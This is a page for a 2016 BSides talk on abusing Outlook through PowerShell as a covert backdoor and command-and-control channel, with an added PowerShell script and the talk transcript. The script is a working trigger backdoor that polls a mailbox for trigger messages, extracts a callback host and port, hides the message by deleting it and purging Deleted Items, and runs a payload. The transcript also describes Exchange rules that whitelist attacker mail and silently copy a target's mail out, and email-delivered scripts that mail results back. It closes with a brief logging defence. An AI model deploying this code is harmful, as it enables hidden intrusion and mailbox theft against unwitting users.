
Owning MS Outlook with PowerShell

BSides Augusta · 2016 · 47:33 · 107 views · Published 2016-09 · Watch on YouTube ↗
About this talk
Andrew Cole demonstrates how to abuse Microsoft Outlook and PowerShell to establish command and control mechanisms without deploying custom tools. The talk covers creating COM objects to interact with Outlook, monitoring email folders for trigger messages, executing arbitrary code via email-based payloads, and exfiltrating data through automated responses—all using built-in Windows functionality.
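The trigger mechanism summarized above, written out as an added worked example. This is not the speaker's Get-Outlook or trigger scripts and not Matt Nelson's proof of concept; it is editorial code that follows the approach the talk describes: attach to a running Outlook through its COM object, poll the Inbox (or Junk) folder, treat a message as a trigger only when its body contains all three trigger words, exactly one number in the port range, and a hostname to resolve for the callback, then mark it read, delete it, and purge it from Deleted Items. Assumptions: a Windows host with Outlook installed and already running under the current user, PowerShell 2.0 or later, and that the function names, parameter names, the constructed sample body, and the Notepad placeholder payload are all mine, not from the talk.

```powershell
# Added example; not the talk's own code. Assumes Outlook is installed and
# already running for this user. OlDefaultFolders enum values used below:
$olFolderDeletedItems = 3
$olFolderInbox        = 6
$olFolderJunk         = 23
$olMail               = 43   # OlObjectClass value for a MailItem

function Get-TriggerParameters {
    # Returns a Host/Port object when the body qualifies as a trigger, else $null,
    # so ordinary recruiter spam never fires the payload by accident.
    param(
        [Parameter(Mandatory=$true)][string]$Body,
        [Parameter(Mandatory=$true)][ValidateCount(3,3)][string[]]$TriggerWords
    )
    foreach ($word in $TriggerWords) {
        if ($Body -notmatch [regex]::Escape($word)) { return $null }   # all three required
    }
    $tokens  = $Body -split '\s+' | ForEach-Object { $_.Trim(',.;:()<>"''') } | Where-Object { $_ }
    $numbers = @($tokens | Where-Object { $_ -match '^\d{1,5}$' })
    if ($numbers.Count -ne 1) { return $null }            # exactly one number allowed
    $port = [int]$numbers[0]
    if ($port -lt 1 -or $port -gt 65535) { return $null }  # must be a valid port
    $hostName = $null
    foreach ($t in $tokens) {                              # first hostname-looking token wins
        if ($t -match '(?:[a-z0-9-]+\.)+[a-z]{2,}$') { $hostName = $Matches[0]; break }
    }
    if (-not $hostName) { return $null }
    New-Object PSObject -Property @{ Host = $hostName; Port = $port }
}

function Resolve-Callback {
    # Resolve the hostname with .NET DNS; a failed lookup means no callback.
    [CmdletBinding()]
    param([Parameter(Mandatory=$true)]$Trigger)
    try {
        $entry = [System.Net.Dns]::GetHostEntry($Trigger.Host)
        $ip = ($entry.AddressList | Where-Object { $_.AddressFamily -eq 'InterNetwork' } |
               Select-Object -First 1).IPAddressToString
    } catch {
        Write-Verbose "DNS lookup for $($Trigger.Host) failed: $_"
        return $null
    }
    New-Object PSObject -Property @{ IP = $ip; Port = $Trigger.Port }
}

function Watch-OutlookTrigger {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$true)][ValidateCount(3,3)][string[]]$TriggerWords,
        [int]$DelaySeconds = 60,
        [switch]$Junk,
        # Placeholder payload (mine, not the talk's): receives the resolved IP and port.
        [scriptblock]$Payload = { param($ip, $port) Start-Process notepad.exe }
    )
    # Creating the COM object starts Outlook if it is not running, which pops a
    # window on the user's desktop; refuse rather than launch it.
    if (-not (Get-Process -Name OUTLOOK -ErrorAction SilentlyContinue)) {
        throw 'Outlook is not running; refusing to launch it.'
    }
    $outlook = New-Object -ComObject Outlook.Application
    $ns      = $outlook.GetNamespace('MAPI')
    $folder  = $ns.GetDefaultFolder($(if ($Junk) { $olFolderJunk } else { $olFolderInbox }))
    $deleted = $ns.GetDefaultFolder($olFolderDeletedItems)

    while ($true) {
        Write-Verbose "Checking folder '$($folder.Name)'"
        # Snapshot the collection: deleting while enumerating a COM Items collection skips entries.
        $items = @($folder.Items | Where-Object { $_.Class -eq $olMail })
        foreach ($mail in $items) {
            $trig = Get-TriggerParameters -Body $mail.Body -TriggerWords $TriggerWords
            if (-not $trig) { continue }
            $cb = Resolve-Callback -Trigger $trig
            if (-not $cb) { continue }
            Write-Verbose "Trigger matched; callback $($cb.IP):$($cb.Port)"
            $subject = $mail.Subject
            $mail.UnRead = $false        # clears the new-mail indicator
            $mail.Delete()               # moves the item to Deleted Items
            # Purge the moved copy (matched by subject; EntryID changes on move).
            @($deleted.Items | Where-Object { $_.Subject -eq $subject }) | ForEach-Object { $_.Delete() }
            & $Payload $cb.IP $cb.Port
        }
        Start-Sleep -Seconds $DelaySeconds
    }
}

# Offline check of the parser on a constructed body (no Outlook needed):
$sample = 'Hi, I saw your profile on LinkedIn. I am an independent contractor doing cyber-security work. Reach me at example.com, 2700 Main Street.'
Get-TriggerParameters -Body $sample -TriggerWords @('LinkedIn','independent','cyber-security')
# Live watcher (Outlook must already be running as this user):
# Watch-OutlookTrigger -TriggerWords 'LinkedIn','independent','cyber-security' -DelaySeconds 30 -Junk -Verbose
```

The parser is kept separate from the COM watcher so the qualification rules (three words, one number, one hostname) can be exercised without Outlook; note that the Deleted Items purge matches on subject, so an unrelated deleted message with the same subject would also be removed, and that polling interval trades RAM against how long the trigger mail sits unread before the user deletes it, as the talk points out.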
Original YouTube description: Video from BSidesAugusta 2016.
Transcript [en]

Our next speaker is Mr. Andrew Cole. Andrew Cole is going to be talking about owning Outlook using PowerShell, and he works for a company named Chiron. Let me tell you a little bit about Chiron, if you're unfamiliar with Chiron. They are here today; they're a security training company, they do a lot of training, and they have an awesome capture the flag upstairs. I see a couple of laptops here; you've got a laptop here, not plugged into that. Great challenges. And Chiron's been a great sponsor to this event, and we are very fortunate to have them in Augusta and also to have Mr. Cole. I've seen this guy present at conferences before, and I can tell you that each year this has been

one of my favorite talks that has come from him and his group at each of these conferences. So if you would, please join me in welcoming Mr. Cole. [Applause]

Thank you. Mark's so nice. All right, this is Owning Microsoft Outlook with Windows PowerShell. The quick obligatory Get-Host: my name is Andrew Cole, everybody just calls me Cole, always have. Oh, damn, Graver's trolling me already. Okay, if you want to find me on Twitter, if you have any questions afterward, you can hit me up at culmination. So, a little bit about me and what I do. I'm currently a content developer and an instructor for Chiron's information operations team. I teach a

number of classes on computer network exploitation using conventional tools and PowerShell, as well as some MPS and defense classes. In my spare time I do a little dabbling in security research, and I mostly just love playing around with PowerShell; it's fun and exciting. In a prior life I was a journeyman interactive operator for the US Army out of Fort Meade. I did that for about four years or so, and I've spoken at a couple of cons, here, NolaCon, so on and so forth. That's about all that's interesting about me.

All right, first my obligatory thanks. I would like to thank BSides for giving me this awesome place to talk at; this is

one of the best venues to do a talk at, it's just the perfect layout. And of course my employer, for paying me to write this. I also need to give some credit to some people whose work sort of inspired me to make this talk. So, Ed Wilson, that's the Microsoft Scripting Guy. He does a lot of stuff, and sometimes he says things that I'm like, wow, I wonder if Microsoft knows that he's publishing that information on their website, because some of it's really, really interesting. And Matt Nelson, he's a really smart guy. He wrote an interesting piece of code that I'll have a link to at the end of this talk that's

sort of led me down this general road for some of the things that we're going to be going over. And last of all, all the awesome people in the PowerShell community that have answered my random questions when I hit them up.

Okay, so why would you want to do this? Why do you want to own PowerShell, or why do you want to own Outlook, and why do you want to use PowerShell? The big thing is, why wouldn't you want to? No matter what sort of network you're doing some red teaming or penetration testing in, odds are good (sorry for messing up your video by walking back and forth), okay, odds are good they use Outlook for their

email. You know, every government agency uses it, most civilian sectors use it; it just integrates so well with Microsoft's other stuff that pretty much everyone uses it for email. PowerShell: as long as that host is Windows 7 or newer, it's going to have PowerShell version 2 on it, which is going to give you an incredible amount of functionality. If all these things are already there in the environment, why would you want to jeopardize your custom tool set? Now, if you're doing red teaming and you've managed to develop a custom tool set, it's only a good custom tool set until it gets caught, and then it's not very useful to you anymore. So if you have

something that's already there on the operating system that you don't have to upload any external binaries for, use that first, then use your one-off tool set for when you don't have any other options.

Okay, so everything that I'm going to be doing here is based off the same general concept: we're going to be creating a custom COM object using PowerShell. For the first script I'm going to be just adding the Microsoft Interop assembly; in a nutshell, that serves as a bridge between .NET and COM. For everything else we're just going to be creating that new COM object for the Outlook application. One of the cool things

about PowerShell is, because it is object-oriented, whenever it grabs something, if we create this variable here, we're not grabbing a pointer to the object, we're grabbing the actual object itself. So we have pretty much full hold and control of Outlook. And if you think about the things that Outlook does in a network, just in its native behavior: it receives messages from outside of the network and it's capable of relaying messages back out to that external network. So you've got a great sort of command and control system set up there by default.

All right, so the first thing we're going to look at is going to be a little bit

of collection. We can collect pretty much anything that Outlook houses. Outlook views everything that it has as a folder, so it's not just the inbox, it's not just the junk folder; there's also the calendar, the contacts, the tasks. I know in any environment that I've ever been in, for the most part, if you go to the commander's or CEO's desktop, like, everything's there. But if you want to know what he's doing, everything is in his Tasks folder, right? So in Outlook he's got his whole calendar set there with everything he's doing for the next six months, and he's got all of his projects and what percentage he's through them all in his Tasks folder. So

it's useful stuff to collect. All right, I should be able to do this. Can everyone read that, or do I need to make it bigger? Oh wow, it's really big up there. We're going to say it's good. All right, so I... whoa, that's the wrong one. There we go. All right, so we're going to start with this collection script. I wrote it with help menus and everything, so hopefully if June B sees this she's proud of me. And down here, so it's a fairly simple script. It's called Get-Outlook. It has a couple of parameters set up; all the parameters are basically just switches, because it's going to pull in the same manner regardless of what folder

you're going to. This is just to designate what folder you're actually going to pull the information from. By default, if you don't tell it to do anything, it goes straight to the inbox. If you want to pull from a different folder, you just need to put the appropriate switch on there to say which folder you want it to harvest information from. So this little section (the pointer is hard to see), this section right here, is what was on one of the earlier slides: we're just grabbing that object that is Outlook. I should note that you want to make sure Outlook is running on the host before you do this, because if Outlook's not already running when you create that COM object

for Outlook, guess what it's going to do? It's going to start Outlook. Guess where it's going to start? On the user's desktop. So it's going to make the big old popup that says, hey, here's Outlook. So you want to be wary of where you pop it up; make sure they already have it open. Fortunately, when most people show up to work, what's the first thing you do? You log in, you open Outlook, you check your email, and then you minimize it and go on with your day. Nobody ever closes Outlook and then reopens it later to see if they've gotten a new email. So after that we just have a series of switches specifying, you know,

if you want to get the calendar, you just go to the calendar. All the different switches do is specify what folder to go to. So if you pick the Calendar switch, the folder equals the namespace default folder for Calendar; if you choose Tasks, it switches it to Tasks; and if it's Contacts, it makes it Contacts. That's all it needs, is to know what folder to pull from. It then, so right here, has: if it is the Sent folder, the target folder is then Outlook folder Sent Mail; otherwise, default to Outlook folder Inbox. There's also a Full switch. So what you actually see in Outlook for an

email is a very small amount of the information that actually gets transmitted. Has anyone ever opened up and looked at all the metadata that goes along with an email? Like, there's a lot of stuff in there. So if you do put the Full switch, it's going to grab the full content of every email. So I have a little safety catch in there that, you know, says hey, this might be really, really large, are you sure this is what you want to do? And if you say yes, then it goes on and runs through, and if not, then it aborts and falls back. If you don't specify the Full switch, it just goes for a default view

that shows a table that has the subject line, sender, who it goes to, the date/time, and I believe the body, but the body won't contain the whole body unless you expand the property to see it all. Right, so I always pray to the demo gods before I do a demo, even if it's pre-recorded. I was having a slight problem running these demos live on my laptop, because once you give four gigs of RAM to your Exchange server, a couple gigs to your DC, and a couple to a few workstations, there wasn't too much left for my host laptop, so it wasn't functioning well. So we just played it safe and went with pre-recorded

videos. Go on over there. There we go. So what I'm doing here is, first I'm importing the module. So any time you have a script in PowerShell, you have to import the module and load it up before you can execute it. Once the module's loaded up, I'm just going to type Get-Outlook. By default it again pulls the inbox and puts it in a little table format, so you can see if there's anything in there that is of interest; if there's not, you could move on. And at this point I'm doing a Full here, so to give you an idea how much stuff is in Full, that's those same four emails set to full output. So it's a very large

amount of information; it's all the metadata associated with the email itself. The rest of them pretty much go along in the same manner. So if you specify Sent, it pulls from Sent. The Contacts, I have it pull all the fields by default; if they're not populated, it'll just leave them blank. But they all pull, again, in the same manner, because Outlook views each of them as a folder, not as separate entities.

All right, so moving on from there, looking at client side. There's a number of things that you can do with Outlook for client side, because one of the number one ways you client-side people is you send them spear-phishing emails and you

get them to click on the email. One of the problems you have is sending them an email and not having Exchange or Outlook sort of snatch it up and quarantine it. So how does the email system, how does Exchange, decide what emails are junk and which are just absolute outright malware? Well, there's something called your spam confidence level. So your spam confidence level has a rating scale of 0 to 9, plus -1. -1 is assigned to any email that comes from the trusted internal network. So if you have two people that are both logged into the same domain sending an email between each other, it's a -1; it automatically goes back and forth no

matter what, it's considered safe and trusted, unless there are custom Outlook rules or custom Exchange rules that say otherwise. Other than that, it'll be assigned a score of 0 to 9. 0 is extremely trusted; it just says okay, there's no way this is malware, it's just a line of text, and it will let it go through. Depending on what other attributes the email has: so if you add an attachment that has any executable functionality, that's going to make the jump; if you add any links to external sites, that makes the jump. So depending on how many points each one is allocated based on what's on the email, it'll raise that spam confidence level, and as it gets higher and higher it will

trip, first, the junk setting, where it just goes straight to the junk folder; not that bad. If it goes to quarantine (quarantine is an optional one, it's not there by default in Exchange, but if the person does add it), that's the worst one for us, because it gets sent to the quarantine folder on the Exchange server and only an Exchange admin has access to that folder to clean it up, so you'll have a little issue there. If it gets really bad, it would go to reject, in which case it won't send the email and it sends a notice to the sender. Or if it's, you know, coming from a Nigerian prince who wants to transfer you money

while selling you Viagra on the side, it might go ahead and bump all the way to delete and just get wiped out with no notification to anybody. So what does this have to do with Outlook? Technically nothing, but this has to do with Exchange, so I'm going to count it, because the two work hand in hand. So there's a cmdlet that's built into PowerShell, but only for PowerShell for Exchange, so you will have to actually get access to the Exchange server, or if you get administrator creds you can PowerShell remote into the Exchange server and you'll have access to this cmdlet. What New-TransportRule does is it lets you make a new transport rule to

designate how mail is handled, where it goes to, whatever you want. And this can be based on where it comes from, the sender. I like FromAddressContainsWords and SubjectOrBodyContainsWords, so remember those two later on when we start talking about some of the other things we're going to do later. But one of the easiest things to do is, once you're already in the network and you get access to the Exchange server, you want to make sure your later client-sides will work: set up sort of a redundancy system. We can use this first command. So we're going to set a new transport rule; we're just going to

name it "set". You could name it whatever you want to name it. So we're going to say anything coming from our attacker email address going to our default target, we're just going to set the SCL to -1. So anything that we send, no matter what it is, I can attach an executable to this file and send it to him and it's going to go directly to his inbox, even though it's coming from malicious.net or wherever; it's going to send it right in. The other thing you can do that's fun and exciting is this bottom example. So we're going to set a new transport rule, we're going to call it BCC, and we're going to say anything that is

sent to our target person, we're just going to automatically blind carbon copy it to ourselves. So now every email that person gets is going to get exfilled in the background out to our email address, and we don't even have to do anything else; we just leave these rules in place.

All right, so now let's talk about the fun stuff. Let's talk about backdoors. Every backdoor has one of two traits, right? It's either based on having a bind shell or a reverse shell. So they both have some flaws, or things that can make them rather detectable. If you've got a permanently bound socket, that's horrible; no one should do that anymore. Hopefully no penetration testers are still at that level that they're leaving a socket bound on the host. It's too easy to find, detect, and stop. Beacons are harder to find; that's definitely the preferred method. The issue that you might have there is, even if you add some variance into your callbacks, eventually

there's a good chance someone will have a fine-tuned IDS that's going to catch the traffic going on the wire. So the best of both worlds gives you a host that has triggerable access: you have something that's not necessarily holding a socket open or listening, but is waiting for some form of a trigger. A prime example of this is like a port-knock backdoor. You know, it's waiting for particular packets to hit 445, followed by 135, followed by 139, and if it gets them, it'll then have the payload call out. That's a triggerable backdoor. The benefit of triggerable backdoors is, again, you have no sockets bound whatsoever, there's no unnecessary

network traffic, and you have 24/7 access. Outlook is an ideal triggering mechanism, if you think about it. What does it do? It sits there at all times and waits for traffic to come from wherever and auto-forwards it to the host. So if you have something in Outlook that's listening for your trigger, as soon as the trigger hits, it can have your payload call out. So this portion I got inspired from Matt Nelson. He wrote a nice little proof-of-concept code that did this; again, the link to it is going to be at the end of the presentation. This is only a triggering mechanism; you still have to have a persistence method

like anything else. It is a PowerShell script; it has to be started by something. So you'll need some persistence method that's going to start it up, and you'll need to have some sort of payload that it triggers. For this simple proof-of-concept code I just had it trigger a calculator, because that seems to be the proof-of-concept go-to: if you can pop a calculator, you can pop a shell. So what the process is here: it's going to monitor the inbox for the trigger email. When the trigger's detected, it's going to start the payload and have something call back out. Matt Nelson's did this; the only things I did, that I really tweaked on it

a little bit, is his deleted the email. I wanted to mark it as unread first, and then after I delete it I also wanted to remove it from the Deleted Items folder so it's not still just sitting there. After that it goes and sleeps for a designated interval and waits for another trigger

packet. Everything's easy to see except for the cursor. There it is, maybe. There we go. All right.

All right, so for this trigger to work we have to have a certain set of parameters that are defined. Obviously you have to have the delay, for how long you want it to sleep; the payload, for what you want it to actually trigger, again in this case I'm going to set it to a calculator; and then for this basic one it's just looking for the sender's email address and then the subject line. So if it receives an email from the designated sending address and it has the designated subject line, it's going to go into its other instructions and execute the payload, and then it'll sleep for a delay. If it gets any email that

doesn't meet both those criteria, it's going to just go about its business, go through a sleep, and then come back to another cycle. There is also a switch if you want to monitor the junk folder instead of monitoring the inbox; that's fine and dandy too. People tend to pay as much attention to things that go to the junk folder, so maybe you wanted to put a transport rule in that set the SCL to 2, so that your email automatically went to junk, in which case you would set your folder, your monitoring, to junk. So in this beginning section here we're just defining which folder we're going to look at. The junk folder is folder

number 23; the Outlook folder for the inbox is folder number 6. I don't know what all the other folder numbers are, because they have a lot more folder numbers than they have actual folders; I guess they left some blank space in there in case they needed it for some future use. So then we've got this process that starts, and it's going to start the Outlook again and get that COM object, and then we're defining the folder to be whichever folder was specified in the earlier section. After that it's going to define a variable called emails that is everything that's in that folder, and then for those emails (you didn't see that), for those emails there's this little if statement

that says if the sender address matches the sent mail and if the subject matches the trigger subject, then it will go into this behavior. So the first thing it does is mark Unread to false; so that's going to make it not show up as a new email, it's going to make it sort of go away, not go away, but it's going to mark it as read. After that it's going to delete the email, so it gets moved to the Deleted Items folder and isn't sitting in the inbox anymore, and it's then going to set this variable of cleaned to false. So I used to have it just run through and automatically clean up after it ran

through the trigger, but then I'm scanning two different folders and it was doubling the resources necessary for the script. So now I just set a variable: once it finds the trigger email and deletes it, it sets the variable to false, so that, excuse me, so that it knows it has to clean up. So then, if cleaned is equal to false, it will go through these clean-up steps. So the first thing it does is it grabs the Deleted Items folder, and then it defines the emails as everything that's in the Deleted Items folder, and then it looks for that same email, and when it finds it, it'll delete it from the Deleted Items and then set the cleaned

variable to true, so in the next cycle through it won't attempt to clean up unless it receives another trigger. After that it will start the sleep cycle. And I missed the part where it's calling the

payload. Yep, it's right here. Okay, I knew I skipped it. So yeah, in the middle of that, right before it deleted the email, was Start-Process payload. So whatever you had set as your process... Now, it wouldn't have to be an executable file; instead of using Start-Process here you could use Invoke-Expression and have it run a blob of a script instead. You could do whatever you really wanted it to be, whatever you wanted to set your payload to. So after it goes through that, and after it cleans up, it then just sleeps for its delay, and after it finishes its sleep it goes back to monitoring the inbox again.

Okay, so again it's going to import the module so it'll load up. I already have the email prepped, but I have it sitting in the junk folder. So I also have, if anyone's not familiar with PowerShell, all those lines that say Write-Verbose that are in the script, those aren't going to do anything unless the script is started with the -Verbose switch, in which case it will give you extra information. So once I start the trigger mechanism going, you're going to see it write the Write-Verbose line saying it's checking the inbox, email not found, and then sleeping and going through the cycle. And then as soon as I

move the junk email from the junk folder to the inbox, you'll see it then trigger on the email and run through the rest of its steps and describe what it's doing as it goes. The video is moving right... there we go. Okay, so there's the verbose lines. It's going through its sleep cycle, it's not finding an email, and it's moving on, because there's no email that matches the trigger in the inbox. So now I'm going to go to the junk email; there is the email that matches the sender and the subject line. So it's in the folder, and you can see it just caught it, triggered, and started a calculator for us.

[Applause] Yay. All right, that's a fun, happy crowd. All right, so what's the one big problem with using email as a triggering mechanism? What happens when you get an email? You open it. How do you know that you have one? Yeah, it makes a popup, right? You get this little thing that looks a lot like that that shows up. So what happens if you periodically get a popup, and then you go to the folder and the email's gone? You might just scratch your head and think it's a glitch the first time, but about the third or fourth time you have this magical email that keeps popping up from the same sender and then magically

disappearing, you might start to call your IT guy and be like, I think I'm owned. Or you're just not very cyber-smart and you might just roll with it for the rest of your life, I don't know. But we're going to give people the benefit of the doubt and assume at some point they would make a jump. So the issue that you have there is, well, you still have to send the email for the trigger to work, but that deleting the email afterwards is going to sort of get you caught eventually. So I had a co-worker who said, could you make that dynamic? And I thought, huh, yeah, I bet you could. Thank you, Flip. And so I wrote a

script to run more dynamically, so it doesn't have to come from a specific IP address or email address, it doesn't have to have a set trigger line; it can be any email that matches certain trigger criteria. So who here has a LinkedIn account? All right, so then, having that LinkedIn account, who at least once every two weeks gets some spam email from some recruiter that scraped you off of your LinkedIn account? Yeah, it's annoying as hell. Do you even pay attention to them, or do you just leave them there and move them to your junk folder or delete them? Yeah, I don't even read mine most of the time anymore; I just delete them

and move on. So that's the premise we're going to work with. We're going to filter on the body of the email instead of the sender address or the subject line. What we're going to do is we're going to have it look for a series of trigger words somewhere in the body of the email. So these would have to be three words that are common enough that it wouldn't seem really strange; you know, you can't have "superfluous" and "supercalifragilisticexpialidocious" and crap like that all together, because people are going to notice those words recurring over and over again. But on the other hand, it has to be specific enough that it's unlikely that a false trigger will get

sent; we don't want an actual email from a real person to trigger our payload either. So we need to find the three trigger words in the email. Additionally, we have to find a single number. The email can't have more than one number in it; it has to have a single number that falls within the port range, so it has to be between 1 and 65,535. It also has to have a URL. That URL will be resolved to an IP address that will then be used for the callback. So this way you can send your email from any email address you want, with any subject line; the body just has to contain three words, a URL

that can translate to the IP you want it to call back to, and a single number that is the port you want it to call back to. This way, when you put your payload on target, you can do a number of things. If you're a big Metasploit friend and there's no antivirus in the network, you can make a default Meterpreter payload that doesn't have a statically assigned callback, that has a dynamic one, so you can provide parameters and have that call back. Or you can just have a little blob of PowerShell that opens up a socket and calls back; whatever suits your fancy. That wasn't supposed to happen yet. Pay

no mind to the turtle; he's not really there. All

right. Okay, so the parameters that you would have to specify here, and I put a little bit of parameter control on here to make sure you give valid ones. So the first one is you need your trigger words, and I'm using ValidateCount there to make sure you gave exactly three trigger words, because if you give less than that, the script will probably freak out and not be happy. We have a delay, of course; this is still monitoring an inbox, so you have to set a delay, and when you're setting the delay you need to find a balance. If you set it too short, it's going to start really burning RAM, because it's just constantly

scanning the inbox over and over again. If you set it to a long delay, you're going to be waiting a while for it to scan, find your email, and trigger your callback, so if your email gets deleted before it finds it, you won't get your callback. So you need to find a middle ground there. Then you have to specify a payload, so what you want it to actually trigger. And again, it'll scan the inbox by default, or if you tell it to move to the junk folder, it'll go to the junk folder instead. The rest of this should look very familiar: it's selecting the junk folder or the inbox, or hooking Outlook

the same way we did every time. And then for each email, if the body matches trigger words zero, trigger words one, and trigger words two, because our trigger words are just saved as a string array, so as long as it finds all three of them, it will then grab the body of the email and it's going to load it up in a variable. And then we have two other variables I've defined here: one is the regex for a URL, and another is the regex for every possible port range. I really suck at regex, so I need to thank my co-workers again for writing my regex for me; it is not my forte at all. That was

Jared. After that, for each section in the... so the formatted is just the body of the email split on every space, so it's grabbing each word, or each section between spaces, and calling it a section, and then it's checking each one of those, and if it matches the URL regex, it's going to grab it and acknowledge that that is what it's going to have to use as its callback address. If it matches the port regex, it's going to set that as the port. So down here we're going to set lookup to use the .NET accelerator, [System.Net.Dns], to get the host entry for that URL, and we've just got a catch

statement there for if it goes FUBAR on us. And then we're doing the .NET IPAddress for the IP equals lookup for that address, and then set the address to a string. So I don't have an actual payload for the demo here; instead I'm having it resolve our corporate email for the IP address, and then it's just going to pop a text document that says the IP address I would call back to is this IP, the port I would call back to is this port. Come back. All right,

I'm doing good for time all right so again we're going to import the module first uh we're setting it to go in the trigger words I think what I picked were uh LinkedIn independent and cyber tax security figured those are all words that won't pop as like nasty buzzword but they're also things that are unlikely to show up in an email by themselves cuz who hyper hyphenates cyber security um or even uses the term term as much anymore so this is my email I saw your profile in LinkedIn I'm an independent contractor yada y yada uh do uh cyber security you can reach me at chyon tech.com and then I found a street address is a great place to squeeze in a

port number because street addresses do not generally have more than five digits to them and ports also do not have more than five digits to them so it's a great place to put your port number so it's again it's looking for the email it's running it's not finding any because again it's in the junk email folder right now and not in the folder that uh it's monitoring so it's just going to go through and sleep and try to find things because nothing in the inbox matches so we're going to take our junk email and we are going to move it to our inbox and it should find it in just a second so it said hey I found Chiron

Tech and it popped open a notep so it will call back to that IP address on Port 2700 and I think I have an NS lookup for our corporate IP address going that'll show that the port or rather the IP address is the same so that way it can call back to whatever you want and you don't have to use the same callback IPS or emails each time you set things up um let me minimize that too so that's awesome triggering back doors is great um anyone tell me what is better than triggering a back door what if you don't even have to get on the box to begin with I mean at the end of the day automation makes your

life so much easier so what if you could have something that monitors Outlook and instead of having a call back that's going to trigger a payload and call you back what if it's a what if the task you need to do is a smaller easier one say uh it is that CEO and you know everything of value is on his desktop so maybe you just want to get the contents of that desktop and pull it back on a recurring basis well we can use uh Outlook to get our information for us and be our command and control mechanism for our automation script without having to get a shell on the target and if you think about it it's

designed to receive emails it'll then take the instructions we give it do our collection attach it to another email and exfil the information right back out to us using the same email system okay the problem with this is you can't just send a .ps1 script to Outlook it is not going to work anything with the .ps1 extension is instantly recognized as executable code and at a minimum it's going to go to the junk folder and have the code disabled uh depending on how the Exchange rules are set up it can quarantine or reject your email so that leaves us two possible options we can either put our script literally in the body of the email or we

can just attach it as a .txt file um Outlook and Exchange consider text files to be completely harmless and benign they don't even monitor for them they just let them right through so you could have done either method I opted to just go for the attachment so I'm just going to put the commands I want into a text file and attach them to the email okay so it's a fairly fairly simple process um this could be streamlined and I plan to streamline it a little more in a uh later evolution of this but I just haven't gotten to it yet so it's going to monitor the inbox or junk folder whatever you tell it once it detects the

email it's going to and again this is dynamic so it's looking for three trigger words in the email body and then once it finds it it's going to take the attachment and it's going to save the attachment to disk uh in the temp folder um once it saves it it's going to grab its contents uh save them as a variable and then delete that temporary file it's going to take that variable which contains your script it's going to execute whatever instructions were inside of it and after it executes it's going to write the results out to another temporary file on the disk which it will then attach as an attachment to an email that will go back to whatever

email address sent the script in in the first place uh afterwards it'll go through the the standard cleanup procedures it'll blow away that second temp file it will delete both the trigger and exfil emails from the Inbox and the Sent Items folder and then it'll clean up the Deleted Items folder how am I doing on time I need to go a little faster okay so it functions in a similar manner to the others so I'm just going to all it needs for parameters is the delay and the trigger words uh that's setting the folder again I'm going to skip down to the part that is new so for a place to save to disk I just

went ahead and saved to the temp folder and for the names for the temporary files I went with tilde DF some numbers because that's always there anyways it's how Windows saves temp files there to begin with so we'll just throw a couple extras in there they're not going to be there long enough for anyone to notice and no AV is going to be looking for malicious .txt files because they're non-executable so it's going to save it to disk afterwards it's going to create a new Outlook item we're just setting a subject the body redefining the To address as the attacker email from the trigger email and attaching the text file and then sending it afterwards it

goes through cleanup which basically matches all the others um on this last video you're going to notice things are a little bit different uh there's going to be some popups and I will explain what the popups are afterwards all right so there there are going to be two popups one is going to be when we start trying to grab emails from the inbox you're going to see a popup from Outlook saying hey somebody's doing something bad do you want to let them do this also when we try to send an email it's going to make another popup that says hey somebody's doing something bad are you sure you want to let them do this so I'll I'll get into how we get

around those uh later well momentarily because I'm running out of time okay so this one has I made a much simpler email uh but it's got the three trigger words and it has a text document and the text document has one command which is just Get-Process so all it's going to do is grab a process list and send the email back out in the script I commented out the part where it cleans up the emails because I need to have the sent email there to show that it actually worked if it deleted it I'd just be like it did it I promise so it's going to run through I have it loaded up with the three trigger words

uh kitty dog and cheeky uh it's searching and when I move the email to the inbox it should now momentarily there's the popup it says hey somebody just tried to grab this email and do something are you sure you want to allow this so I said yes allow it it's then going to run the command and there's another one that says hey a program is trying to send an email in your name are you sure you want to allow this I went ahead and said yes so it's sent so it sent the item the verbose says that it was cleaning up but it didn't actually clean up and if we look at the Sent Items folder there will be an email

on there to our attacker with an attachment that should have the process list ta-da all right so I think it's kind of sh minimize I think it's kind of shady to give a talk talking about nasty stuff you can do without giving a quick preview of how you can actually do some defense to this so how can you stop these things from happening how can you protect yourself um oh I skipped a slide this is just what I'd like to do in the future obviously I'd want to add encryption but I'm I'm smart enough about encryption to know that I'm not smart enough to roll my own so I would have someone else roll my crypto for me uh and I would like to

merge it all into one tool so you could sort of do it as an all-in-one and not have four separate scripts so how do you protect yourself for starters you can go ahead and get rid of your AV product um this is a horrible idea to do in general but the reason we didn't get popups in the first three um videos and we did in the fourth the fourth one uh did not have an antivirus product yeah did not have an antivirus product on it so once an antivirus product registers Outlook says oh there's an AV I don't have to protect myself anymore the AV product is going to do it for me so those popups that you

saw on the fourth video was Outlook defending itself but if you have an AV product thank you Avast you did a great job um Outlook assumes that everything's fine and that the AV product will take care of it so it didn't so I guess you just need to have a better uh antivirus product than Avast free version maybe Avast paid version will check email and monitor um but it does make Outlook disable its own defenses other things you can do I mean stopping it from happening is difficult unless you know you're monitoring your Exchange server but I mean event logs assume breach and just monitor your event logs um starting with uh Colonel

61 so Windows if you have that particular hotfix attached in addition to auditing process creation you can also include the command line in the event log so if you have the command line it's going to have when the PowerShell process starts it's going to have that it's starting a script and where it's loading that script from look at that um PowerShell logging if you're on a system that has PowerShell you have a PowerShell log turn it on and set the settings um if you have PowerShell version 4 or newer uh there's a feature called PowerShell transcription so you can just type Start-Transcript and it will record every command and everything that those commands return that happens

in a PowerShell session there's also a setting you can turn on that has mandatory PowerShell transcript ah transcription so anytime that PowerShell pops on the host it's going to run and everything that got typed and written gets written to disk but it doesn't alert the user that it's doing it the user in this case being the attacker these are my shoutouts so for the scraping Outlook I got the idea from Ed Wilson's thing on um exporting your Outlook calendar and for the triggers I got the initial idea from again Matt Nelson's blog uh it is very good I would recommend you read it if you uh have copious spare time um if you want any of

these code samples they are all up on GitHub feel free to grab them modify them do what suits your fancy just please if you use them irresponsibly you didn't get them from me and that's all I have does anybody have any questions yes you are aware that you can do .Visible after Outlook when you create the COM object to make it disappear so the user hadn't actually loaded it already you could load it make it disappear or not be visible for more than half a second or so and then do everything you need to do so it could be done before hours or after hours and the users are gone no I did not actually know that wow I

learned something today this was a really good talk I learned something thank you I'll have to talk to you afterwards uh any other questions fer yes um you mentioned earlier encryption so something separate from that would you be able to use steganography and just say um and then so you want to for which aspects so you want to store the scripts that I had that are running or the one for the command and control that it runs when when you're sending the user when you send the user a PowerShell script inside that text okay kind of obvious they can open it up and see it even if it's if you were to hide that inside an image

